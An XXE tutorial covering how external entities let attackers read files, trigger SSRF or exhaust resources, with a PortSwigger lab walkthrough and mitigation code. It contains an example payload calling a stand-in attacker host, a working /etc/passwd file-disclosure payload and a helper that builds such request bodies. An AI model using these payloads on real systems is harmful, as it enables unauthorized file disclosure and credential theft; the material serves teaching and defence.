XML External Entity

XML External Entity (XXE) vulnerabilities occur when an application parses untrusted XML input that contains external entity references, and the XML parser resolves those entities without restriction. Attackers can abuse this behavior to read local files, perform server-side request forgery (SSRF), cause denial of service (DoS), or (in rare cases) achieve code execution.

How XXE Attacks Work

The following steps outline how an XXE attack is carried out, from injecting malicious XML to exploiting the vulnerable parser.

1. Untrusted XML Input: An attacker submits malicious XML data to the application. This data might contain a seemingly harmless reference to an external entity.

Example: An attacker submits a login request with the following XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [ <!ENTITY xxe SYSTEM "https://attacker.com/steal_credentials.txt"> ]>
<user>
  <username>attacker</username>
  <password>weakpassword</password>
  <avatar>&xxe;</avatar>
</user>

In this example, the document type declaration defines an external entity named `xxe` that points to a URL controlled by the attacker (`https://attacker.com/steal_credentials.txt`), and the `avatar` element references it as `&xxe;`.

2. Improper Validation: The application passes the XML to a parser that is configured to resolve external entities, without restricting or rejecting the entity declaration.

3. Exploiting the Reference: The application attempts to access the external resource specified in the entity reference. An attacker can manipulate this behavior for malicious purposes.

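Example: The vulnerable parser fetches the attacker's URL and substitutes the response for the entity reference.
The fetched text is not executed. The danger is that the same mechanism works for `file://` paths and internal URLs, and the outbound request itself tells the attacker that the parser resolves external entities.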
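
The three steps above can be imitated with a deliberately naive resolver. This is a toy sketch, not a real XML parser: the function name `naiveExpand`, the temporary file, and its contents are all invented for illustration. It only shows why resolving a `SYSTEM` entity ends up placing file contents inside the parsed document.

```javascript
// Toy illustration only: real XML parsers are far more complex.
const fs = require("fs");
const os = require("os");
const path = require("path");
const { fileURLToPath, pathToFileURL } = require("url");

/**
 * Hypothetical helper that mimics a parser with external entities enabled:
 * it reads each <!ENTITY name SYSTEM "file:..."> declaration and substitutes
 * the file's contents wherever &name; appears in the document body.
 */
function naiveExpand(xml) {
  const entities = new Map();
  const declaration = /<!ENTITY\s+([\w.-]+)\s+SYSTEM\s+"([^"]*)"\s*>/g;
  for (const [, name, uri] of xml.matchAll(declaration)) {
    if (uri.startsWith("file:")) {
      entities.set(name, fs.readFileSync(fileURLToPath(uri), "utf8"));
    }
  }
  // Drop the DOCTYPE, then replace each known reference with the file text.
  const body = xml.replace(/<!DOCTYPE[^\[]*\[[\s\S]*?\]\s*>/, "");
  return body.replace(/&([\w.-]+);/g, (ref, name) =>
    entities.has(name) ? entities.get(name) : ref
  );
}

// Demo with a harmless temporary file standing in for a sensitive one.
const secretPath = path.join(os.tmpdir(), `xxe-demo-${process.pid}.txt`);
fs.writeFileSync(secretPath, "db_password=hunter2");

const payload = `<!DOCTYPE user [ <!ENTITY xxe SYSTEM "${pathToFileURL(secretPath).href}"> ]>
<user><avatar>&xxe;</avatar></user>`;

const expanded = naiveExpand(payload);
console.log(expanded.trim());
fs.unlinkSync(secretPath);
```

If the application later echoes the `avatar` value back to the client, the file contents travel with it, which is the in-band disclosure case.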

Potential Impacts of XXE Attacks

Information Disclosure: Attackers can use XXE to retrieve files from the server, potentially exposing sensitive data like user credentials, financial information, or internal documents.

Example: An attacker might use XXE to read the file `/etc/passwd` on the server,
which lists the system's user accounts. On modern Linux systems the password hashes are stored separately in `/etc/shadow`, which is normally readable only by root.

Server-Side Request Forgery (SSRF): XXE attacks can be used to trick the server into making unauthorized requests to other internal systems or even external websites.

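Example: An attacker might use XXE to force the server to send a request to an internal system
that exposes user data (such as an internal API or a cloud metadata service that is not reachable from the internet), or to use the server as a source of requests against another website.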

Denial-of-Service (DoS): By crafting malicious XXE entities that consume excessive resources, attackers can overload the server and make it unavailable to legitimate users.

Example: An attacker might submit an XXE payload that forces the server to download
a large file repeatedly, exhausting system resources and causing a denial of service.

Code Execution (Rare): In some cases, XXE vulnerabilities can be exploited to execute arbitrary code on the server, allowing attackers complete control over the system.

Example (Hypothetical): An attacker might exploit a specific vulnerability in the XML parser,
or a URI scheme handler that runs commands (such as PHP's `expect://` wrapper when the expect extension is loaded), to gain remote access to the server.

Types of XXE Attacks

The main types of XXE attack are:

In-band (File disclosure): The parser returns the contents of a local or remote file directly in the application response, exposing sensitive data.
Out-of-band (OOB) XXE: The application is induced to make network requests to an attacker-controlled server, which receives exfiltrated data asynchronously.
Blind XXE: No direct data is returned, but the attacker infers information from side effects (timings, error differences, or external callbacks).
SSRF via XXE: XXE causes the server to request internal network resources (internal APIs, metadata services), enabling discovery or further compromise.
DoS (Entity expansion): Malicious XML entities trigger excessive resource consumption (e.g., “billion laughs”), crashing or slowing the parser.
Chained attacks: Attackers combine the above techniques (e.g., read configuration, then perform SSRF) to escalate impact.
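
The entity-expansion case is easiest to appreciate with a little arithmetic. The sketch below assumes the classic "billion laughs" layout: a base entity containing `lol`, with nine further layers that each reference the layer beneath ten times. The function name `expandedLength` and its parameters are illustrative, not part of any library. It computes the expanded size without building the string.

```javascript
/**
 * Computes how many characters a nested-entity ("billion laughs" style)
 * document expands to, without actually building the string.
 * levels: number of entity layers stacked on top of the base entity.
 * fanOut: how many times each layer references the layer below it.
 * baseLength: length of the innermost entity's text (e.g. "lol" is 3).
 */
function expandedLength(levels, fanOut, baseLength) {
  // BigInt keeps the result exact for sizes beyond Number.MAX_SAFE_INTEGER.
  return BigInt(fanOut) ** BigInt(levels) * BigInt(baseLength);
}

const chars = expandedLength(9, 10, 3);
console.log(`Expanded size: ${chars} characters`);
// prints "Expanded size: 3000000000 characters"
```

A short document can therefore ask the parser to materialize about three billion characters, which is why parsers that cap entity expansion or reject DTDs altogether are not affected.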

Hands-On Lab

Prerequisites

Burp Suite: Ensure you have Burp Suite (Community or Professional) set up to intercept HTTP requests.
Lab Access: You need access to the PortSwigger lab environment at the provided URL.
Browser: Use a browser with Burp Suite proxy configured to intercept requests.

Steps to Solve the Lab

This exercise uses the PortSwigger lab "Exploiting XXE using external entities to retrieve files".

Step 1: Access the Product Page and Identify Check Stock Feature

Navigate to the lab: Exploiting XXE using external entities to retrieve files

Browse to any product page in the lab’s web application (e.g., click on a product like "Widget" or "Gadget").

Locate the "Check stock" button on the product page and click it to trigger a stock check request.

This action sends a POST request to the server with XML data containing the product ID and store ID.

Step 2: Set Up Burp Suite to Intercept the Request

Open Burp Suite and ensure the proxy is configured to intercept requests (Proxy > Intercept > Intercept is on).
In your browser, click the "Check stock" button again.
Burp Suite will intercept the POST request. Its body is an XML document with a stockCheck root element that contains productId and storeId elements.

Step 3: Modify the XML to Include an External Entity

In Burp Suite, forward the intercepted request to the Repeater tool for easier manipulation (right-click the request and select "Send to Repeater").
In the Repeater tab, modify the XML body to inject an XXE payload.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY hm SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>&hm;</productId>
    <storeId>1</storeId>
</stockCheck>

Explanation:

<!DOCTYPE test [ <!ENTITY hm SYSTEM "file:///etc/passwd"> ]> defines an external entity named hm that references the /etc/passwd file on the server.
&hm; in the <productId> field is a reference to that entity. When the server parses the request, it replaces the reference with the contents of /etc/passwd.
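
When trying several files in Repeater, it can help to generate the body rather than edit it by hand. The helper below is a hypothetical convenience, not part of Burp Suite or the lab: `buildXxeBody` is an invented name, and it assumes an absolute Unix-style path on the target.

```javascript
/**
 * Hypothetical helper: builds the stock-check body used in this lab with an
 * external entity pointing at the given absolute file path on the server.
 */
function buildXxeBody(filePath, storeId = 1) {
  const entityName = "hm"; // same entity name as the payload above
  return [
    '<?xml version="1.0" encoding="UTF-8"?>',
    `<!DOCTYPE test [ <!ENTITY ${entityName} SYSTEM "file://${filePath}"> ]>`,
    "<stockCheck>",
    `    <productId>&${entityName};</productId>`,
    `    <storeId>${storeId}</storeId>`,
    "</stockCheck>",
  ].join("\n");
}

// Prints a body equivalent to the one shown in Step 3.
console.log(buildXxeBody("/etc/passwd"));
```

The output can be pasted into the Repeater request body as is.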

Step 4: Send the Modified Request

In Burp Suite Repeater, click Send to submit the modified POST request to the server.
Observe the server’s response in the Repeater’s response pane.

Step 5: Verify the Response

The server should process the XML, resolve the hm entity, and include the contents of /etc/passwd in the response, typically as part of an error message about the invalid product ID.

The presence of /etc/passwd contents (e.g., user account details like root:x:0:0:root:/root:/bin/bash) indicates a successful XXE exploit.
The lab should mark itself as solved if the server correctly returns the file contents.

Mitigating XXE Vulnerabilities

By understanding and implementing these mitigation strategies, developers can significantly improve the security posture of their web applications and prevent XXE vulnerabilities:

Disable External Entity Processing: This is the most secure approach but may limit functionality. Configure the XML parser to disallow external entity resolution entirely.
Whitelist Allowed Entities: Specify a list of authorized external entities that the parser can access. This restricts potential attack vectors but requires maintaining the whitelist.
Input Validation and Sanitization: Rigorously validate and sanitize user input before processing XML documents. This involves checking for malicious XML constructs like external entity references and removing them.
Update XML Libraries: Regularly update XML processing libraries used in your application. Updates often include patches for identified XXE vulnerabilities.
Secure Development Practices: Implement secure coding practices throughout the development lifecycle. This includes using secure coding libraries and frameworks, and following best practices for handling user input.
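
As a minimal sketch of the first and third items, an application that never needs DTDs can refuse them before the XML reaches any parser. The function name `assertNoDtd` and the sample documents are assumptions made for illustration. The check is intentionally conservative and works on an already decoded string.

```javascript
/**
 * Hypothetical pre-parse guard: refuses any XML string that declares a DTD
 * or an entity, so a parser never sees external entity definitions.
 * This is a defence-in-depth check, not a substitute for parser hardening.
 */
function assertNoDtd(xml) {
  if (/<!DOCTYPE/i.test(xml) || /<!ENTITY/i.test(xml)) {
    throw new Error("XML with DOCTYPE or ENTITY declarations is not accepted");
  }
  return xml;
}

const safe = "<review><author>John Doe</author><rating>5</rating></review>";
const hostile =
  '<!DOCTYPE r [ <!ENTITY x SYSTEM "file:///etc/passwd"> ]><review>&x;</review>';

console.log(assertNoDtd(safe) === safe); // input passes through unchanged

try {
  assertNoDtd(hostile);
} catch (err) {
  console.log(`Rejected: ${err.message}`);
}
```

A string check like this can reject harmless documents that merely mention `<!DOCTYPE` inside text, and it does nothing if the parser later receives the data by another route. Where the parser offers a setting to disable DTDs or external entities, that setting should be the primary control.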

Steps:

Before running the code, you need to install the required dependencies.

Run the following command:

npm install xml2js xml-sanitizer

Create a new JavaScript file (e.g., processReview.js) and paste the code shown below.

Run the following command:

node processReview.js

Example: The following code sanitizes the incoming XML before parsing it. The sample review it processes contains no entity references.

JavaScript

// processReview.js
const xml2js = require("xml2js");
// Import the sanitization library
const xmlSanitizer = require("xml-sanitizer");

/**
 * Processes a product review written in XML format.
 *
 * This function takes a string containing valid XML as input
 * and extracts the author name, content of the review, and rating.
 * It then prints this information to the console.
 *
 * @param {string} reviewXml - The XML string representing the product review.
 */
function processReview(reviewXml) {
  // Sanitize the untrusted input before handing it to the parser
  const sanitizedXml = xmlSanitizer(reviewXml);

  const parser = new xml2js.Parser();

  parser.parseString(sanitizedXml, (err, result) => {
    if (err) {
      console.error("Error processing review:", err);
      return;
    }
    const review = result.review;

    const author = review.author[0];
    const content = review.content[0];
    const rating = review.rating[0];

    console.log(`Review by: ${author}`);
    console.log(`Content: ${content}`);
    console.log(`Rating: ${rating}`);
  });
}

// Example of a valid review with no entity references (no attack)
const validReview = `
<review>
  <author>John Doe</author>
  <content>This product is amazing!</content>
  <rating>5</rating>
</review>
`;

processReview(validReview);

Output

Review by: John Doe
Content: This product is amazing!
Rating: 5

Explanation:

We import the xml2js library using require("xml2js").
We import the xmlSanitizer function using require("xml-sanitizer").
The processReview function takes the review XML as a string argument.
We sanitize the XML using the xmlSanitizer function.
We create a new xml2js.Parser object.
We use parser.parseString to parse the XML string. It takes a callback function that handles the parsed data.
Inside the callback, we check for any errors during parsing.
If there is no error, we read the review object from the parsed result. By default xml2js wraps child element values in arrays, which is why each field is read with [0].
We extract the author, content, and rating from the parsed data structure.
Finally, we print the review details.

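Remember: This is a simplified example for demonstration purposes only. Sanitizing input does not by itself make XML parsing safe. In a real application, you should also disable external entity resolution in the parser and implement proper validation and whitelisting of allowed entities to prevent XXE attacks.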

By understanding the potential dangers of XXE vulnerabilities and implementing the recommended mitigation strategies, developers can create more secure web applications.